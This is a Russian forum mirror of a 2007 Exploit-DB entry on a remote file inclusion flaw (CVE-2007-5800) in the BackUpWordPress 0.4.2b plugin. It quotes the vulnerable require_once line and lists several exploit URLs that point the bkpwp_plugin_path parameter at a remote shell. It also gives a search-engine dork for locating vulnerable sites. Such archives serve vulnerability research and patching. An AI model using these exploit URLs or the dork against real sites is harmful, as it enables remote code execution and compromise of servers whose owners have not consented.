- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4593
- Проверка EDB
-
- Пройдено
- Автор
- S.W.A.T.
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-5800
- Дата публикации
- 2007-11-01
Код:
--------------------------------- [ Xmors Underground Team ! ] --------------------------------------
Title : BackUpWordPress <= 0.4.2b Remote File Inclusion Vulnerability
--------------------------------------------------------------------------------
#Author: S.W.A.T.
#cont@ct: [email protected]
--------------------------------------------------------------------------------
------------------------- -------------------------------------------------------
Application : BackUpWordPress 0.4.2b
Download : http://wordpress.designpraxis.at/download/backupwordpress.zip
--------------------------------------------------------------------------------
Vuln :
require_once $GLOBALS['bkpwp_plugin_path']."PEAR.php";
--------------------------------------------------------------------------------
Exploit:
http://[target]/_path]/plugins/BackUp/Archive.php?bkpwp_plugin_path=Shl3?
http://[target]/_path]/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=Shl3?
http://[target]/_path]/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=Shl3?
http://[target]/_path]/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=Shl3?
& other Files & Folders In The [Archive] Folder
--------------------------------------------------------------------------------
Dork:
"inurl:/plugins/BackUp"
--------------------------------------------------------------------------------
--------------------------------- [http://www.xmors.com ] --------------------------------------
# milw0rm.com [2007-11-01]- Источник
- www.exploit-db.com
